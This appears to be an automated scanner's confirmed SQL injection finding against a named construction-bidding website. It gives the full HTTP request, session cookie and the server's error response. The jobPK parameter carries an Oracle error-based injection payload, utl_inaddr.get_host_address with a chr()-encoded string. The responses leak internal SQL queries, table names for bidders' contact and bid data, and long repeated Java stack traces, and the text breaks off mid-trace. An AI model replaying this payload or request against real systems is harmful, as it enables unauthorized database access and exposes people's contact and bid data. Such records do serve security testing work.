j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = (utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))) GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASCORA-06512: at "SYS.UTL_INADDR", line 19ORA-06512: at "SYS.UTL_INADDR", line 40ORA-06512: at line 1 at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td> <td width="100%" height="100%" valign="top"> <table class="menubar" cellpadding="0" cellspacing="0" width="100%" valign="top"> <tr> <td> <div class="btn_menu2" onclick="doPlanHolders();"> View Plan Holders </div> </td> <td> <div class="btn_menu2" onclick="doDownload();"> Download Project PDF </div> </td> <td> <div class="btn_menu2" onclick="doAddenda();"> Addenda </div> </td> </tr> </table> <table class="prj_detail" width="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="100%" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td colspan="2" width="100%" height="10"><span class="prj_title">City of Chelsea, Iowa: Sanitary Sewer Improvements Project<span><span class="prj_num">(#1464405)</span></td> </tr> <tr> <td width="15" height="10"></td> <td colspan="2" height="10"> <div class="btn_container"> <span class="btn_generic" onclick="ShowProjectPreview();">Print Ad</span> </div> <!--input type="button" value="Email Ad" onclick="ShowSendProjectPreview()"/--> </td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="100%" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">county/city/state:</span></td> <td width="210" height="10"><span class="prj_data">Tama - Chelsea, IA</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">directions to site:</span></td> <td width="210" height="10"><span class="prj_data">Not available</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">bids close:</span></td> <td width="210" height="10"><span class="prj_data">03/03/2011, 02:00:00 PM</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">bids received by:</span></td> <td width="210" height="10"><span class="prj_data">City of Chelsea, IA<BR>City Hall<BR>600 Station Street<BR>Chelsea, IA 52215</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle"><font color="red" size="2">addenda:</font></span></td> <td width="210" height="10"> <p class="prj_data"><font color="red" size="2"><strong>2</strong></font></p> </td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></..
|
- /qap/projects/prj_browse/ipp_prj_view.html
/qap/projects/prj_browse/ipp_prj_view.html CONFIRMED |
Parameters
| Parameter | Type | Value |
| ShowProjectDetails | GET | TRUE |
| viewOnly | GET | TRUE |
| group | GET | 11 |
| provider | GET | 765295 |
| jobPK | GET | (utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))) |
Request
GET /qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&viewOnly=TRUE&group=11&provider=765295&jobPK=(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL))) HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:04:03 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:04:03 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 12832
Content-Type: text/html;charset=utf-8
<script language="javascript1.1">function DownloadBidTab(sjobNbr){ req_window = window.open ("/qap/projects/prj_browse/prj_download_bid_tab.html?job_no=" + sjobNbr,"","height=300,width=500");}function ShowViewResults(jobPK){ var w = window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&viewOnly=TRUE&group=11&provider=765295&jobPK=' + jobPK, 'ViewResults', 'status,resizable,scrollbars,width=700,height=600'); w.focus();}function PrintPage(){ window.print();}</script><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Results</title></head><body> <font color="#FF0000">2011/03/01 14:04:24.694 [ 1] (TP-Processor1187) Problem including template component SQLLOOP query="SELECT j.name, p.company, p.contact, p.phone, p.email_address, TO_CHAR(j.award_date, 'MM/DD/YYYY') Award_Date, j.job_no, j.bid_tab_file_name, j.Award_Final, j.Job_Comment, TO_CHAR(j.Bid_Date, 'MM/DD/YYYY HH:MI:SS PM') Bid_Date FROM jobs j, job_professionals jp, professionals p WHERE j.job_no = <?p:jobPK?> AND jp.job_no = j.job_no AND jp.professional_no = p.professional_no AND p.PROJ_SOLICITING_AGENT = 'y' " name="ProjectOwnerInfo"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-29257: host _!@3dilemma unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 while executing: SELECT j.name, p.company, p.contact, p.phone, p.email_address, TO_CHAR(j.award_date, 'MM/DD/YYYY') Award_Date, j.job_no, j.bid_tab_file_name, j.Award_Final, j.Job_Comment, TO_CHAR(j.Bid_Date, 'MM/DD/YYYY HH:MI:SS PM') Bid_Date FROM jobs j, job_professionals jp, professionals p WHERE j.job_no = (utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))) AND jp.job_no = j.job_no AND jp.professional_no = p.professional_no AND p.PROJ_SOLICITING_AGENT = 'y' ORA-06512: at "SYS.UTL_INADDR", line 19ORA-06512: at "SYS.UTL_INADDR", line 40ORA-06512: at line 1 at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <font color="#FF0000">2011/03/01 14:04:47.058 [ 1] (TP-Processor1187) Problem including template component SQLLOOP query="SELECT ma.company_name, u.name, aa.phone, u.email, ph.bid_amount, to_number(ph.bid_amount), DECODE(ph.Awarded,'Y','Yes','') Awarded FROM member_accounts ma ,users u ,addresses addr ,address_types addrt ,account_addresses aa ,plan_holders ph ,jobs j WHERE j.job_no = <?p:jobPK?> AND j.job_no = ph.job_no AND ph.member_no = ma.member_no (+) AND ph.user_no = u.user_no AND u.member_no = ma.member_no AND ma.member_no = aa.member_no AND aa.address_type_no = addrt.address_type_no AND addrt.name = 'main' AND aa.address_no = addr.address_no AND ph.bid_amount IS NOT NULL UNION SELECT ph.company_name, ph.contact_name, ph.phone, ph.email, ph.bid_amount, to_number(ph.bid_amount), DECODE(ph.Awarded,'Y','Yes','') Awarded FROM plan_holders ph WHERE ph.job_no = <?p:jobPK?> AND manual_planholder = 1 AND ph.bid_amount IS NOT NULL ORDER BY 6 ASC " name="PlanHolders"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-29257: host _!@3dilemma unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 while executing: SELECT ma.company_name, u.name, aa.phone, u.email, ph.bid_amount, to_number(ph.bid_amount), DECODE(ph.Awarded,'Y','Yes','') Awarded FROM member_accounts ma ,users u ,addresses addr ,address_types addrt ,account_addresses aa ,plan_holders ph ,jobs j WHERE j.job_no = (utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))) AND j.job_no = ph.job_no AND ph.member_no = ma.member_no (+) AND ph.user_no = u.user_no AND u.member_no = ma.member_no AND ma.member_no = aa.member_no AND aa.address_type_no = addrt.address_type_no AND addrt.name = 'main' AND aa.address_no = addr.address_no AND ph.bid_amount IS NOT NULL UNION SELECT ph.company_name, ph.contact_name, ph.phone, ph.email, ph.bid_amount, to_number(ph.bid_amount), DECODE(ph.Awarded,'Y','Yes','') Awarded FROM plan_holders ph WHERE ph.job_no = (utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))) AND manual_planholder = 1 AND ph.bid_amount IS NOT NULL ORDER BY 6 ASC ORA-06512: at "SYS.UTL_INADDR", line 19ORA-06512: at "SYS.UTL_INADDR", line 40ORA-06512: at line 1 at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> </td> </tr> </table></body></html>
Date: Tue, 01 Mar 2011 20:04:03 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:04:03 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 12832
Content-Type: text/html;charset=utf-8
<script language="javascript1.1">function DownloadBidTab(sjobNbr){ req_window = window.open ("/qap/projects/prj_browse/prj_download_bid_tab.html?job_no=" + sjobNbr,"","height=300,width=500");}function ShowViewResults(jobPK){ var w = window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&viewOnly=TRUE&group=11&provider=765295&jobPK=' + jobPK, 'ViewResults', 'status,resizable,scrollbars,width=700,height=600'); w.focus();}function PrintPage(){ window.print();}</script><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Results</title></head><body> <font color="#FF0000">2011/03/01 14:04:24.694 [ 1] (TP-Processor1187) Problem including template component SQLLOOP query="SELECT j.name, p.company, p.contact, p.phone, p.email_address, TO_CHAR(j.award_date, 'MM/DD/YYYY') Award_Date, j.job_no, j.bid_tab_file_name, j.Award_Final, j.Job_Comment, TO_CHAR(j.Bid_Date, 'MM/DD/YYYY HH:MI:SS PM') Bid_Date FROM jobs j, job_professionals jp, professionals p WHERE j.job_no = <?p:jobPK?> AND jp.job_no = j.job_no AND jp.professional_no = p.professional_no AND p.PROJ_SOLICITING_AGENT = 'y' " name="ProjectOwnerInfo"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-29257: host _!@3dilemma unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 while executing: SELECT j.name, p.company, p.contact, p.phone, p.email_address, TO_CHAR(j.award_date, 'MM/DD/YYYY') Award_Date, j.job_no, j.bid_tab_file_name, j.Award_Final, j.Job_Comment, TO_CHAR(j.Bid_Date, 'MM/DD/YYYY HH:MI:SS PM') Bid_Date FROM jobs j, job_professionals jp, professionals p WHERE j.job_no = (utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))) AND jp.job_no = j.job_no AND jp.professional_no = p.professional_no AND p.PROJ_SOLICITING_AGENT = 'y' ORA-06512: at "SYS.UTL_INADDR", line 19ORA-06512: at "SYS.UTL_INADDR", line 40ORA-06512: at line 1 at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <font color="#FF0000">2011/03/01 14:04:47.058 [ 1] (TP-Processor1187) Problem including template component SQLLOOP query="SELECT ma.company_name, u.name, aa.phone, u.email, ph.bid_amount, to_number(ph.bid_amount), DECODE(ph.Awarded,'Y','Yes','') Awarded FROM member_accounts ma ,users u ,addresses addr ,address_types addrt ,account_addresses aa ,plan_holders ph ,jobs j WHERE j.job_no = <?p:jobPK?> AND j.job_no = ph.job_no AND ph.member_no = ma.member_no (+) AND ph.user_no = u.user_no AND u.member_no = ma.member_no AND ma.member_no = aa.member_no AND aa.address_type_no = addrt.address_type_no AND addrt.name = 'main' AND aa.address_no = addr.address_no AND ph.bid_amount IS NOT NULL UNION SELECT ph.company_name, ph.contact_name, ph.phone, ph.email, ph.bid_amount, to_number(ph.bid_amount), DECODE(ph.Awarded,'Y','Yes','') Awarded FROM plan_holders ph WHERE ph.job_no = <?p:jobPK?> AND manual_planholder = 1 AND ph.bid_amount IS NOT NULL ORDER BY 6 ASC " name="PlanHolders"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-29257: host _!@3dilemma unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 while executing: SELECT ma.company_name, u.name, aa.phone, u.email, ph.bid_amount, to_number(ph.bid_amount), DECODE(ph.Awarded,'Y','Yes','') Awarded FROM member_accounts ma ,users u ,addresses addr ,address_types addrt ,account_addresses aa ,plan_holders ph ,jobs j WHERE j.job_no = (utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))) AND j.job_no = ph.job_no AND ph.member_no = ma.member_no (+) AND ph.user_no = u.user_no AND u.member_no = ma.member_no AND ma.member_no = aa.member_no AND aa.address_type_no = addrt.address_type_no AND addrt.name = 'main' AND aa.address_no = addr.address_no AND ph.bid_amount IS NOT NULL UNION SELECT ph.company_name, ph.contact_name, ph.phone, ph.email, ph.bid_amount, to_number(ph.bid_amount), DECODE(ph.Awarded,'Y','Yes','') Awarded FROM plan_holders ph WHERE ph.job_no = (utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))) AND manual_planholder = 1 AND ph.bid_amount IS NOT NULL ORDER BY 6 ASC ORA-06512: at "SYS.UTL_INADDR", line 19ORA-06512: at "SYS.UTL_INADDR", line 40ORA-06512: at line 1 at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at 